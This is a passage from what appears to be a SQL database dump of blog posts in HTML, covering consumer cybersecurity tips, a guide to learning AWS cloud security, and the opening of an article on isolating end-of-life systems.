or kiosks whenever possible.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Generate Unique Username Emails for Logins</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Most people re-use their email address across multiple accounts. But what if you could create a unique email for each login? This simple trick adds a layer of protection to your accounts.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When combined with strong passwords, having unique emails for different accounts makes it almost impossible for hackers to access all your logins, even in the event of a data breach.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use email tools like Apple’s \"Hide My Email\" feature, ProtonMail’s SimpleLogin, or append unique identifiers with Gmail by adding \"+[identifier]\" to your address (e.g., myemail+netflix@gmail.com).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Apply this practice to new accounts you create going forward.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Set Up a Credit Freeze</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A credit freeze prevents lenders from accessing your credit history, making it much harder for identity thieves to open new accounts in your name.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even if a hacker has your Social Security number or other details, a credit freeze blocks them from using your information to apply for loans or credit cards.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Contact major credit bureaus like Experian, TransUnion, and Equifax.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Request a freeze on your credit, which you can easily lift temporarily if you need to apply for credit yourself.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Remove Your Personal Data from Data Brokers</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Data brokers collect and sell personal information such as your address, phone number, and email. This information is often used by scammers or hackers attempting to trick you into revealing sensitive details.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Eliminating your data from these platforms reduces the chances of being targeted. While this can be time-intensive, you also have the option of using services that do it for you, like DeleteMe.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify which data brokers hold your information. Common ones include Whitepages, Spokeo, and MyLife.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Follow each site’s opt-out request process, or use a third-party service to remove your details automatically.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Prioritize Physical Device Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You may have robust online protections, but what about your physical devices? Protecting your smartphone, tablet, laptop, or any device you use is essential to ensure they remain secure.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Lost or stolen devices are an entry point for hackers. Thankfully, basic precautions like device encryption and screen locks make it nearly impossible for bad actors to retrieve data.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Turn on encryption for your devices (this is usually enabled by default on modern smartphones).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use strong passwords, PINs, or biometric authentication (like fingerprint or face recognition) for device access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Enable \"Find My Device\" features for remote locking or wiping in case of theft.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Proactive Cybersecurity Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Online security is no longer optional—it’s essential. Following these lesser-known tips can greatly enhance your digital safety, reduce hackers’ chances of accessing your personal data, and help you stay one step ahead.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to make sure all your personal information is truly protected? Services like DeleteMe can save you hours of effort by removing your data from data brokers. They’ve made cybersecurity a simple, stress-free process.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By adopting these tips, you can enjoy peace of mind while navigating an increasingly connected world. Remember, cybersecurity isn’t just about avoiding attack; it’s about building proactive habits that ensure your safety every day.</p>', '', NULL, NULL, 1, 'draft', '2025-01-31 00:59:59', '2026-01-12 21:41:44', 'Information Security', '7 Cybersecurity Tips Easy to Do', '', NULL),
(53, 'The Fastest Way to Learn Cloud Security', 'the-fastest-way-to-learn-cloud-security', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The demand for cloud security professionals has never been greater. With the cloud computing market projected to hit a staggering $1.6 trillion by 2030, the opportunities in cloud security are growing exponentially. A recent survey shows that 35% of organizations highlight cloud security as their biggest talent gap, while nearly 40% of IT professionals identify it as their most critical skills shortage. This dynamic presents an unprecedented opportunity for those looking to break into the field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But how do you learn cloud security quickly and effectively to land a job? Certifications and watching YouTube tutorials alone won\'t cut it. The rules for succeeding in this domain in 2025 have evolved. Here’s a detailed, SEO-friendly guide inspired by proven strategies to help you kickstart your career in cloud security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Build a Strong Cloud Foundation</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before you can secure the cloud, you need to understand how it works. A solid foundation in cloud computing is your starting point to mastering cloud security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why AWS?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Focus on mastering AWS (Amazon Web Services). AWS is the leading cloud provider in the market and offers the most opportunities for cloud professionals. Additionally, the knowledge you gain with AWS is transferable to other platforms like Microsoft Azure and Google Cloud Platform (GCP).</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Concepts to Cover</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Shared Responsibility Model</strong></b>: Understand how cloud providers handle physical and infrastructure security while you manage data, permissions, and applications.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Virtualization</strong></b>: Learn how virtualization enables cloud providers to split physical servers into multiple virtual machines, ensuring efficiency and security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Basic Cloud Architecture</strong></b>: Familiarize yourself with storage, networking, operating systems, and how cloud environments are structured.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Certification Boost</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For beginners, obtaining the <b><strong class=\"font-bold\">AWS Certified Cloud Practitioner</strong></b> certification is a great starting point. It provides a foundational understanding of AWS and builds your confidence without requiring in-depth technical knowledge.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Pro-Tip</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Adopt a curious mindset. Question everything to grasp why specific technologies are used. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Why are <b><strong class=\"font-bold\">Virtual Private Clouds (VPCs)</strong></b> necessary, and what problems do they solve?</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">How do security groups differ from network access control lists (NACLs)?</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding the \"why\" provides clarity and helps you make better decisions as a cloud security professional.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Learn Cloud Security Principles and Fundamentals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you have a foundation in cloud computing, it’s time to layer in security principles. Here are the critical concepts to focus on:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The CIA Triad</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start with the basics of <b><strong class=\"font-bold\">confidentiality, integrity, and availability (CIA)</strong></b>—the three core pillars of information security. These principles form the foundation for everything in cloud security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Identity Access Management (IAM)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Mastering IAM is essential as it plays a significant role in controlling access to cloud resources. Learn how to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Create roles and permissions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Implement policies to ensure the principle of least privilege (granting only the necessary permissions).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Encryption Fundamentals</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understand symmetric and asymmetric encryption, key management, and how encryption secures data in transit and at rest.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Security Tools and Technologies</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Familiarize yourself with security groups, VPCs, and NACLs, which control traffic and secure your infrastructure. These tools, combined with active threat monitoring services like <b><strong class=\"font-bold\">AWS GuardDuty</strong></b>, allow you to build robust security systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Certification</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The <b><strong class=\"font-bold\">CompTIA Security+</strong></b> certification is excellent for solidifying your knowledge and following a structured learning path. While certifications alone won’t guarantee a job, they signal to employers that you’ve mastered the fundamentals.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Apply Your Knowledge by Building Real Projects</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Theory and certifications can only take you so far. Practical experience is key to demonstrating your ability to solve real-world problems. Here’s how to get started:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Build Security-Focused Cloud Projects</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One simple yet impactful project you can undertake is securing a static website hosted on <b><strong class=\"font-bold\">Amazon S3</strong></b>. This will help you understand key cloud security principles, such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Bucket Policies</strong></b>: Configuring policies to prevent unauthorized modifications while maintaining public access to website content.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">IAM Roles</strong></b>: Creating roles with minimal permissions to optimize security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Infrastructure as Code (IaC)</strong></b>: Use <b><strong class=\"font-bold\">Python</strong></b>, <b><strong class=\"font-bold\">Terraform</strong></b>, or <b><strong class=\"font-bold\">TypeScript</strong></b> to automate setting up secure infrastructure. Automation prevents errors commonly caused by manual deployment and ensures consistency.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Implement Threat Detection</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integrate monitoring tools like <b><strong class=\"font-bold\">AWS GuardDuty</strong></b> to detect anomalous activities and respond to potential threats. Learn how to set up alerts and create workflows to mitigate risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Version Control and Documentation</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use <b><strong class=\"font-bold\">GitHub</strong></b> for version control and detailed documentation of infrastructure changes. This not only keeps your work organized but also prepares you for real-world DevSecOps practices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Showcase Your Work</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Document your projects in an online portfolio. Recruiters and hiring managers are often more impressed by practical, demonstrable skills than certifications alone.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Practical Experience Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The best companies are looking for problem-solvers, not just certification holders. When you\'re able to build and secure real solutions, you prove your ability to operate in a professional environment. Employers value hands-on experience that showcases your critical thinking and technical expertise.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Additional Resources and Advice</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Stay Updated with Industry Trends</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cloud security is a rapidly evolving field. Follow blogs, join forums, and subscribe to newsletters to stay current with best practices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Leverage Communities</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Join online communities like LinkedIn groups, Reddit forums, and Discord channels for cloud security professionals. Networking can often open doors to learning resources and job opportunities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Consider Advanced Certifications</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you’ve gained some experience, prestigious certifications like <b><strong class=\"font-bold\">AWS Certified Security – Specialty</strong></b> or <b><strong class=\"font-bold\">Certified Cloud Security Professional (CCSP)</strong></b> can distinguish you as a highly qualified professional.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of Cloud Security Jobs in 2025</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With average cloud security salaries around $133,000 and total compensation packages exceeding $160,000, the potential for growth in this field is immense. By following this guide and committing to continuous learning, you position yourself to thrive in one of the fastest-growing areas of tech.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Be proactive, stay curious, and keep building. And most importantly, don’t just learn <i><em class=\"italic\">what</em></i> to do—understand <i><em class=\"italic\">why</em></i> you’re doing it. That’s the mindset that top cloud security engineers adopt to solve the toughest challenges.</p>', '', NULL, NULL, 1, 'draft', '2025-01-28 00:49:36', '2026-01-12 21:41:44', 'Information Security', 'The Fastest Way to Learn Cloud Security', '', NULL),
(54, 'Why Isolating End-of-Life (EOL) Systems is Critical for Cybersecurity', 'why-isolating-end-of-life-eol-systems-is-critical-for-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">In an ideal world, businesses would always operate on up-to-date, secure, and supported software. The reality, however, is that many organizations continue to rely on End-of-Life (EOL) systems or applications, even when they pose significant risks to cybersecurity and operational efficiency. But why are these legacy systems still in use, and how can organizations safeguard their networks if they\'re dependent on such outdated technology?</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This article uncovers the reasons EOL systems persist in organizational environments, explores the risks they pose, and provides actionable solutions to securely leverage legacy systems while protecting your organization\'s network.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What are EOL Systems and Why Do We Rely on Them?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">End-of-Life (EOL) systems</strong></b> are software or hardware products that manufacturers no longer actively support. This means they no longer receive updates, including critical security patches that protect against new vulnerabilities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Despite their risks, EOL systems remain in use for several reasons:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Operational Dependencies</strong></b>: Mission-critical applications may run exclusively on legacy systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cost of Upgrades</strong></b>: Replacing or modernizing software or hardware can be prohibitively expensive.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Compatibility Issues</strong></b>: Newer platforms may not support older applications.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Industry-Specific Needs</strong></b>: Some industries rely on niche software with no modern equivalent.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unfortunately, while these systems may seem essential to business operations, their vulnerabilities make them a significant liability in today\'s cyber threat landscape.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Risks and Vulnerabilities of Using EOL Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using EOL systems without proper protective measures is akin to leaving your front door wide open. Here\'s why these systems are so dangerous to organizational security:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Lack of Security Updates</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once a system reaches EOL status, developers stop releasing updates and patches. Any vulnerabilities discovered post-EOL will remain unaddressed, leaving the system wide open to attackers.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Increased Attack Surface</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Attackers actively exploit known flaws in outdated systems, targeting organizations that rely on unsupported software. This effectively makes EOL systems a high-priority target for cybercriminals.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Compliance Issues</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Reliance on unsupported systems may violate industry regulations like GDPR, HIPAA, or PCI-DSS. This can result in fines, legal penalties, and damage to your organization\'s reputation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Operational Risks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Beyond security, outdated systems pose other operational risks, such as performance issues, lack of vendor support, incompatibility with modern hardware, and software conflicts.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Isolating EOL Systems from the Main Network</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Given these risks, isolating EOL systems from your organization\'s main network is crucial. Doing so helps reduce exposure and safeguard your broader network. Here\'s how network isolation can mitigate the risks associated with EOL systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong 